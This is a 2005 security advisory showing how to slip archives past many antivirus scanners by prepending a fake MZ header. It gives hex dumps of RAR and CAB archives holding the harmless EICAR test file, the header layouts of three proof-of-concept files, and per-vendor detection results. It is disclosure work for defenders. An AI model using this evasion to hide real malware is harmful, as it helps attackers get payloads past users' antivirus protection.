-=====================================================================-

Release Date : 2005-10-05
Tested on: Windows 2000 SP2 & SP4
Tested with: Jotti Online Antivirus Scanner
Tested with: VirusTotal Online Antivirus Scanner
Tested with: Command line freeware UnRAR v3.50
Tested with: PowerZip v7.06

Affected Products:
* Kaspersky Antivirus
* BitDefender Antivirus
* NOD32 Antivirus
* F-Prot Antivirus
* Avast Antivirus
* McAfee Antivirus
* Sophos Antivirus
* Symantec Antivirus
* Dr.Web Antivirus
* Avira Antivirus
* Norman Virus Control Antivirus
* Fortinet Antivirus
* VBA32 Antivirus
* Rising Antivirus
* AntiVir Antivirus
* eTrust-Iris Antivirus
* ArcaVir Antivirus
* eTrust-Vet Antivirus
* UNA Antivirus
* Ikarus AntiVirus
* ClamAV Antivirus
* Panda Antivirus
* CAT Quick Heal
* TheHacker
[+] May be others.....

Not affected:
* Only Grisoft AVG AntiVirus have found all PoC

Discovered by: fRoGGz
Credit to: SecuBox Labs
Rated as : Medium

-=====================================================================-

Please, read this first.
________________________

Carefull, it's different than CAN-2004-0932 & CAN-2004-0937 !
Security Focus bid: 11448

Different than vulnerabilty reported by Thierry Zoller & discovered by Dr. Peter Bieringer.
Security Focus bid: 12793

[ Why ? ]

[+] Scanning EICAR.zip ... <- (eicar.com is inside)
[-] Writing central header patch [0x00000016]
[-] Writing local header patch [0x0000007F]
[+] File scanning finished. EOF:16 ERR:0

Scanned files

X:\=>Master Boot Record 80 OK
X:\=>Partition Boot 1 (primary) (active) OK
X:\=>Master Boot Record 81 OK
X:\=>Partition Boot 1 (primary) OK
X:\SecuBox.Labs\Debug\EICAR.zip OK
X:\SecuBox.Labs\Debug\EICAR.zip=>EICAR.com Infected EICAR-Test-File (not a virus)
X:\SecuBox.Labs\EICAR.zip=>EICAR.com Deleted
X:\SecuBox.Labs\EICAR.zip Update

Ok ? So ... it's really different.

-=====================================================================-

Analysis
__________

Specially crafted archive containing a virus will pass
through the antivirus system without detection.

An attacker can compress a malicious payload and evade
detection by some anti-virus software.

The bypassed malicious content does not pose a risk until
extracted from the RAR archive file. Malicious content
will be detected and eliminated by your Antivirus.

Contrary to Winzip or BitZipper which do not authorize the
opening of the file, Winrar & PowerZip open & extract it.

Possible formats are:
/------------------------------------------------------------\
*.RAR, *.ZIP, *.CAB, *.ARJ, *.LZH, *.ACE, *.TAR, *.GZ (GZIP)
*.UUE, *.BZ2, *.JAR, *.ISO, *.7Z, *.Z
\------------------------------------------------------------/

Proof of Concept
________________


************ WARNING *****************
We have used: eicar.com
EICAR test is a 68 bytes file "detect" as if it were a virus.
Read more about EICAR
Notes:: For BitZipper & WinZip file is corrupted !
************ WARNING *****************

Compress file "eicar.com" with Winrar: eicar.rar
-=====================================================================-
00h: 52 61 72 21 1A 07 00 CF 90 73 00 00 0D 00 00 00 ; Rar!...Ï?s......
10h: 00 00 00 00 D3 AD 74 20 90 2E 00 44 00 00 00 44 ; ....Ó­t ?..D...D
20h: 00 00 00 02 3C CF 51 68 EE A4 45 33 1D 30 09 00 ; ....<ÏQhî€E3.0..
30h: 20 00 00 00 45 49 43 41 52 2E 63 6F 6D 00 F0 A0 ; ...EICAR.com.ð 
40h: CB 96 58 35 4F 21 50 25 40 41 50 5B 34 5C 50 5A ; Ë?X5O!P%@AP[4\PZ
50h: 58 35 34 28 50 5E 29 37 43 43 29 37 7D 24 45 49 ; X54(P^)7CC)7}$EI
60h: 43 41 52 2D 53 54 41 4E 44 41 52 44 2D 41 4E 54 ; CAR-STANDARD-ANT
70h: 49 56 49 52 55 53 2D 54 45 53 54 2D 46 49 4C 45 ; IVIRUS-TEST-FILE
80h: 21 24 48 2B 48 2A C4 3D 7B 00 40 07 00 ; !$H+H*Ä={.@..
-=====================================================================-

Malicious archive must start with a fake MZ header.
Of course, we must test for create a valid archive file.

-=====================================================================-
Archive is correct :: No errors found during test operation
-=====================================================================-
UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal
Extracting from SecuBox_AVPoC2.rar
Extracting EICAR.com OK
All OK

UNRAR 3.50 freeware - Copyright (c) 1993-2004 Alexander Roshal
Testing archive SecuBox_AVPoC2.rar
Testing EICAR.com OK
All OK

Note:: For PowerZip, only SecuBox_AVPoC2.rar is valid, not PoC n°1.
-=====================================================================-

Proof Of Concept N°1
--------------------
[e_magic][archive] >> Like this >> [4D5A][526172211A0700...]

Results for: SecuBox_AVPoC1.rar
_______________________________

[?] AntiVir Found nothing
[?] ArcaVir Found nothing
[?] Avast Found nothing
[!] AVG Antivirus Found EICAR_Test (+187)
[!] BitDefender Found EICAR-Test-File (not a virus)
[!] CAT-QuickHeal Found Eicar.Test
[~] ClamAV Found nothing >> Suspect
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[!] Fortinet Found EICAR_TEST_FILE
[?] F-Prot Antivirus Found nothing
[!] Ikarus Found EICAR_Test
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[!] Panda Found Eicar.Mod
[?] Sophos Found nothing
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] UNA Found nothing
[?] VBA32 Found nothing

PoC n°1
MD5: e907ab569a6ceed6233e33828032c8f4
SHA1: 071ba79957b80b11b85bb05bdf00f2edb803f4bb

-=====================================================================-

Proof Of Concept N°2
---------------------
[e_magic] [e_cblp] [e_cp] [00+archive...]
( 4D5A ) ( 5000 ) (0200) (00+52 61 72 21 1A 07 00 CF....

Results for: SecuBox_AVPoC2.rar
________________________________

[?] AntiVir Found nothing
[!] ArcaVir Found Eicar.Test
[!] Avast Found EICAR Test-NOT!!
[!] AVG Antivirus Found EICAR_Test
[?] BitDefender Found nothing
[!] CAT-QuickHeal Found Eicar.Test
[~] ClamAV Found nothing >> Suspect
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[?] Fortinet Found nothing
[?] F-Prot Antivirus Found nothing
[?] Fortinet Found nothing
[!] Ikarus Found EICAR_Test
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[!] Panda Found Eicar.Mod
[!] Sophos EICAR-AV-Test
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] UNA Found nothing
[?] VBA32 Found nothing

PoC n°2
MD5: 757e6c7984028653c557d5b0bf5374fd
SHA1: 438d119bae0eedca413f27958172523738889c75

-=====================================================================-

Proof Of Concept N°3
---------------------
[e_magic] [e_cblp] [e_cp] [00+archive...]
( 4D5A ) ( 5000 ) (0200) (00+4D 53 43 46 00 00 00 00....

Compress file "eicar.com" with Winrar: eicar.cab
-=====================================================================-
00h: 4D 53 43 46 00 00 00 00 96 00 00 00 00 00 00 00 ; MSCF....?.......
10h: 2C 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 ; ,...............
20h: 29 00 00 00 46 00 00 00 01 00 01 00 44 00 00 00 ; )...F.......D...
30h: 00 00 00 00 00 00 47 33 F9 86 20 00 45 49 43 41 ; ......G3ù? .EICA
40h: 52 2E 63 6F 6D 00 60 79 2E 6A 48 00 44 00 43 4B ; R.com.`y.jH.D.CK
50h: 8B 30 F5 57 0C 50 75 70 0C 88 36 89 09 88 8A 30 ; ?0õW.Pup.?6?.??0
60h: 35 D1 08 88 D3 34 77 76 D6 34 AF 55 71 F5 74 76 ; 5Ñ.?Ó4wvÖ4¯Uqõtv
70h: 0C D2 0D 0E 71 F4 73 71 0C 72 D1 75 F4 0B F1 0C ; .Ò..qôsq.rÑuô.ñ.
80h: F3 0C 0A 0D D6 0D 71 0D 0E D1 75 F3 F4 71 55 54 ; ó...Ö.q..ÑuóôqUT
90h: F1 D0 F6 D0 02 00 ; ñÐöÐ..
-=====================================================================-

Results for: SecuBox_AVPoC3.cab
________________________________

[?] AntiVir Found nothing
[?] ArcaVir Found nothing
[?] Avast Found nothing
[!] AVG Antivirus Found EICAR_Test
[?] BitDefender Found nothing
[?] CAT-QuickHeal Found nothing
[?] ClamAV Found nothing
[?] Dr.Web Found nothing
[?] eTrust-Iris Found nothing
[?] eTrust-Vet Found nothing
[?] Fortinet Found nothing
[?] F-Prot Antivirus Found nothing
[?] Fortinet Found nothing
[?] Ikarus Found nothing
[?] Kaspersky Anti-Virus Found nothing
[?] McAfee Found nothing
[?] NOD32 Found nothing
[?] Norman Virus Control Found nothing
[?] Panda Found nothing
[?] Sophos Found nothing
[?] Symantec Found nothing
[?] TheHacker Found nothing
[?] UNA Found nothing
[!] VBA32 Found EICAR-Test-File

PoC n°3
MD5: 621990887beb0cbca7a071d3006a7fdf
SHA1: 3edd5b71eaa803d6cdffc181ceaaf9ad9b85cf31

WARNING: Results are not verifiable at 100%
PoC files were checked via VirusTotal & Jotti Online Antivirus Scanner

-=====================================================================-

[ unix analysis ]

thot:~$ clamscan --no-summary SecuBox_AVPoC3.cab
SecuBox_AVPoC3.cab: OK
thot:~$ cabextract SecuBox_AVPoC3.cab
Extracting cabinet: SecuBox_AVPoC3.cab
extracting EICAR.com
All done, no errors.
thot:~$ clamscan --no-summary EICAR.com
EICAR.com: Eicar-Test-Signature FOUND
thot:~$

thot:~$ clamscan -V
ClamAV 0.87/1120/Fri Oct 7 13:06:49 2005

CREDiTS
---------------------
SecuBox Labs - fRoGGz
Greet's fly out to: Jordi Bosveld & VirusTotal

-=====================================================================-











































-- 
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm